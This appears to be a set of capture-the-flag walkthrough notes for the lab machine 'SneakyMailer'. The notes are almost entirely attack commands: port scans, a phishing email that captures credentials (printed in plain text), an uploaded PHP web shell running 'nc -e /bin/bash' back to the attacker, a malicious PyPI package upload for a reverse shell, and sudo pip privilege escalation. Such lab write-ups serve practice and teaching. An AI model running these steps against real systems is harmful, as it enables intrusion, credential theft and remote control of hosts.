nmap -A -p- -oA output 10.129.2.28 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA sneakymailer 10.129.2.28

nmap -sU -O -p- -oA sneakymailer-udp 10.129.2.28

nikto -h 10.129.2.28:80

Pasted image 20220131063810.png

Pasted image 20220131064325.png

echo "10.129.2.28 sneakycorp.htb dev.sneakycorp.htb pypi.sneakycorp.htb" | sudo tee -a /etc/hosts

Pasted image 20220131065748.png

curl -s -X GET "http://sneakycorp.htb/team.php" | html2text | grep "sneakymailer.htb" |awk 'NF{print $NF}' >users

Pasted image 20220131081458.png

cat users | tr '\n' ','

swaks --from "cu3rv0x@sneakycorp.htb" --to "tigernixon@sneakymailer.htb....." --header "Subject: README" --body "Da click http://10.10.14.120/test" --server 10.129.2.28

Pasted image 20220131082500.png

sudo python3 -m htt.server 80

Pasted image 20220131082630.png

Vemos informacion de paul

Pasted image 20220131082827.png

php --interactive

echo ulrdecode("1

firstName=Paul&lastName=Byrd&email=paulbyrd%40sneakymailer.htb&password=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt&rpassword=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt")

Credenciales-> paulbyrd:^(#J@SkFv2[%KhIxKk(Ju'hqcHl<:Ht

Pasted image 20220131175416.png

a1 OK LOGIN

a2 OK LIST completed

a3 EXAMINE "INBOX"

a4 EXAMINE "INBOX.Trash"

a5 EXAMINE "INBOX.Sent"

Pasted image 20220131180230.png

a6 EXMAMINE "INBOX.Deleted Items"

a7 EXAMINE "INBOX.Sent Items"

Pasted image 20220131180617.png

a10 OK FETCH

Pasted image 20220131180841.png

a11 FETCH 2 body[]

Pasted image 20220131181011.png

cat credentials.txt

Pasted image 20220131181304.png

wfuzz -c --hh=185 -t 200 /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -H "Host: FUZZ.sneakycorp.htb" http://sneakycorp.htb

Pasted image 20220131182811.png

http://dev.sneakycorp.htb

Pasted image 20220131183814.png

ftp 10.129.2.28

paulbyrd:^(#J@SkFv2[%KhIxKk(Ju'hqcHl<:Ht

pust cu3rv0x.php

Pasted image 20220206054134.png

Pasted image 20220131184103.png

http://dev.sneaky.corp.htb/cu3rvox.php?cmd=whoami

Pasted image 20220131184336.png

http://dev.sneaky.corp.htb/cu3rvox.php?cmd=nc -e /bin/bash 10.10.14.120 443

Pasted image 20220131184532.png

nc -lvnp 443

Pasted image 20220131184633.png

uname -a

lsb_release -a

find \-perm -4000 2>/dev/null

Pasted image 20220131185946.png

ls -al

cat .htpasswd

john --wordlist=/usr/share/worldlists/rockyou.txt hash

soufianeelhaoui

Pasted image 20220131190434.png

cat /etc/ngnix/sites-available/pypi

Pasted image 20220131190535.png

ps -faux |grep "pypi"

Pasted image 20220131190704.png

http://pypi.sneakycorp.htb:8080

Pasted image 20220131191033.png

mkdir reverse

cd reverse

touch reverse/__init__.py

mkdir reverse

touch reverse/__init__.py

tree

Pasted image 20220131191655.png

Pasted image 20220201182035.png

cat setup.py

Pasted image 20220201183746.png

cat ~/.pypirc

Pasted image 20220201182226.png

python setup.py sdist upload -r reverse

sudo nc -lvnp 443

Pasted image 20220201183931.png

sudo -l

Pasted image 20220201185340.png

https://gtfobins.github.io/gtfobins/pip/

TF=$(mktemp -d) 
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip install $TF

Pasted image 20220201185820.png

boxes

copyright©2022 Cu3rv0x all rights reserved